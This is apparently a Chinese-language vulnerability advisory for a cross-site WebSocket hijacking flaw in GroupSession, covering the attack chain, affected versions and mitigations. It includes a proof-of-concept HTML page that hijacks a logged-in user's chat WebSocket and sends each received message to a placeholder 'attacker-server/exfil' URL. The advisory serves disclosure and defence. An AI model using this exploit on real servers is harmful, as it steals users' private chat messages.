CVE-2025-61987: GroupSession WebSocket Origin验证缺失导致信息泄露

漏洞信息

漏洞编号

CVE-2025-61987

漏洞类型

跨站WebSocket劫持（Cross-Site WebSocket Hijacking）

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

GroupSession Free Edition, GroupSession byCloud, GroupSession ZION

漏洞概述

CVE-2025-61987是GroupSession产品线中的一个中危安全漏洞。该漏洞存在于WebSocket通信机制中，由于服务端未对WebSocket连接的Origin头进行有效验证，导致攻击者可以通过构造恶意网页，诱导已登录用户发起跨域WebSocket连接，从而窃取用户的聊天信息。GroupSession是一款开源的群组协作工具，广泛应用于日本企业环境中。攻击者利用此漏洞可以在用户不知情的情况下，建立到目标GroupSession服务器的WebSocket连接，拦截和获取聊天消息内容。由于漏洞利用无需用户交互且无需认证，攻击门槛较低，建议用户尽快升级到修复版本。

技术细节

该漏洞属于跨站WebSocket劫持（CSWSH）类型。在WebSocket协议握手阶段，浏览器会自动发送Origin头表明请求来源。GroupSession服务器在处理WebSocket连接请求时，未对Origin头进行验证或白名单校验，导致任何来源的跨域请求都可以成功建立WebSocket连接。攻击者可以创建一个包含恶意JavaScript的网页，当已登录GroupSession的用户访问该页面时，脚本会自动向目标GroupSession服务器发起WebSocket连接请求。由于浏览器会自动携带用户的认证Cookie，服务器会认为这是合法用户的连接，从而建立会话。攻击者通过劫持该连接，可以接收服务器推送的聊天消息，实现信息窃取。攻击成功的前提是用户已登录GroupSession且会话未过期。

攻击链分析

STEP 1

步骤1

攻击者搭建恶意网页，包含自动发起WebSocket连接的JavaScript代码

STEP 2

步骤2

攻击者通过钓鱼邮件、社交工程等方式诱导GroupSession已登录用户访问恶意页面

STEP 3

步骤3

用户浏览器访问恶意页面，JavaScript代码自动向目标GroupSession服务器发起WebSocket连接请求

STEP 4

步骤4

浏览器自动携带用户的认证Cookie，服务器验证通过后建立WebSocket连接

STEP 5

步骤5

攻击者通过劫持的WebSocket连接接收服务器推送的聊天消息，实现信息窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-61987 PoC: Cross-Site WebSocket Hijacking -->
<html>
<head>
    <title>CVE-2025-61987 PoC</title>
</head>
<body>
    <h1>CVE-2025-61987 - GroupSession WebSocket Hijacking PoC</h1>
    <div id="output"></div>
    <script>
        // Target GroupSession server URL
        const targetHost = 'http://target-groupsession-server';
        const wsUrl = targetHost.replace('http', 'ws') + '/gsweb/chat/ws';
        
        const output = document.getElementById('output');
        
        function log(message) {
            output.innerHTML += message + '<br>';
            console.log(message);
        }
        
        try {
            log('[*] Attempting WebSocket connection to: ' + wsUrl);
            
            // Create WebSocket connection without origin validation
            const ws = new WebSocket(wsUrl);
            
            ws.onopen = function() {
                log('[+] WebSocket connection established');
                log('[+] User authentication cookie was automatically sent by browser');
                log('[+] Chat messages can now be intercepted');
            };
            
            ws.onmessage = function(event) {
                log('[+] Received message: ' + event.data);
                // Exfiltrate chat data
                fetch('https://attacker-server/exfil?data=' + encodeURIComponent(event.data));
            };
            
            ws.onerror = function(error) {
                log('[-] WebSocket error occurred');
            };
            
            ws.onclose = function() {
                log('[*] WebSocket connection closed');
            };
        } catch (e) {
            log('[-] Error: ' + e.message);
        }
    </script>
</body>
</html>

影响范围

GroupSession Free Edition < 5.3.0

GroupSession byCloud < 5.3.3

GroupSession ZION < 5.3.2

防御指南

临时缓解措施

如果无法立即升级，可通过Web服务器配置对WebSocket端点进行访问控制，限制只有特定IP地址或域名可以建立连接。同时提醒用户不要点击未知来源的链接，避免访问可疑网页。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61987
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61987
3 Details https://www.cvedetails.com/cve/CVE-2025-61987/
4 VulDB https://vuldb.com/cve/CVE-2025-61987
5 Link https://groupsession.jp/info/info-news/security20251208
6 Link https://jvn.jp/en/jp/JVN19940619/